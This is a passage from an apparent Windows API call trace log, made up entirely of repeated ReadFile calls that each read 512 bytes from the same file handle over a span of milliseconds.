lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.383] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.384] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.384] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.384] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.384] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.384] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.389] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.389] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, 
lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.389] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.389] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.389] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.390] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.391] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, 
lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.392] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile 
(in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.393] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 
[0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.394] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, 
lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.395] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, 
lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.396] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: 
lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.397] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, 
lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.398] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.399] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, 